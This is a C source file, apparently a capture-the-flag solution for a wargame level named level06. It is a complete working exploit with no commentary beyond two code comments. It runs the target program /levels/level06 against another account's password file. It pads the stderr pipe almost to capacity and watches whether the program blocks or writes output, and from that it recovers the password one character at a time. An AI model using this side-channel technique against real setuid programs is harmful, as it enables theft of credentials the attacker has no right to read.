level06

1. #include <signal.h>
2. #include <stdio.h>
3. #include <stdlib.h>
4. #include <string.h>
5. #include <strings.h>
6. #include <unistd.h>
7. #include <sys/select.h>
8. #include <fcntl.h>
9.  
10. int guess(char* guess, int full) {
11.   int err[2], out[2];
12.   pipe(err);
13.   pipe2(out, O_NONBLOCK);
14.  
15.   int child = fork();
16.   if (!child) {
17.     close(out[0]);
18.     close(err[0]);
19.  
20.     dup2(out[1], 1);
21.     dup2(err[1], 2);
22.  
23.     if (!full) {
24.       int length = strlen(guess);
25.  
26.       char buffer[65536];
27.       memset(buffer, (int) 0, 65536);
28.       write(err[1], buffer, 65536 - 33 - length);
29.  
30.       char padded_guess[1024];
31.       strcpy(padded_guess, guess);
32.       padded_guess[length] = '?';
33.       padded_guess[length + 1] = 0;
34.       guess = padded_guess;
35.     }
36.  
37.     execl("/levels/level06", "./level06", "/home/the-flag/.password", guess, NULL);
38.     exit(1);
39.   } else {
40.     if (!full) {
41.       fd_set my_fd_set;
42.       struct timeval timeout;
43.       char buffer[256];
44.  
45.       FD_ZERO(&my_fd_set);
46.       FD_SET(err[1], &my_fd_set);
47.       timeout.tv_sec  = 0;
48.       timeout.tv_usec = 0;
49.  
50.       for (;;) {
51.         int result = select(err[1] + 1, NULL, &my_fd_set, NULL, &timeout);
52.         if (result == 0) {
53.           break;
54.         }
55.         usleep(100);
56.       }
57.     }
58.  
59.     // heuristic of how long to wait for echo to have been called
60.     // 3 times to be extra safe
61.     system("nice -n 20 /bin/echo test > /dev/null");
62.     system("nice -n 20 /bin/echo test > /dev/null");
63.     system("nice -n 20 /bin/echo test > /dev/null");
64.  
65.     int r = read(out[0], buffer, 1);
66.  
67.     close(out[0]);
68.     close(out[1]);
69.     close(err[0]);
70.     close(err[1]);
71.  
72.     kill(child, 9);
73.     wait(NULL);
74.     return r == -1;
75.   }
76. }
77.  
78. int main(int argc, char **argv)
79. {
80.   char password[1024];
81.   bzero(password, 1024);
82.  
83.   char* valid_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
84.   int valid_length = strlen(valid_chars);
85.  
86.   for (int i = 0; i < 1000; i++) {
87.     for (int j = 0; j < valid_length; j++) {
88.       password[i] = valid_chars[j];
89.       printf("%c", valid_chars[j]);
90.       fflush(stdout);
91.       if (guess(password, 0)) {
92.         if (guess(password, 1)) {
93.           printf("\n");
94.           exit(0);
95.         }
96.         break;
97.       }
98.       printf("%c", 8);
99.     }
100.   }
101.   printf("\n");
102.   exit(1);
103. }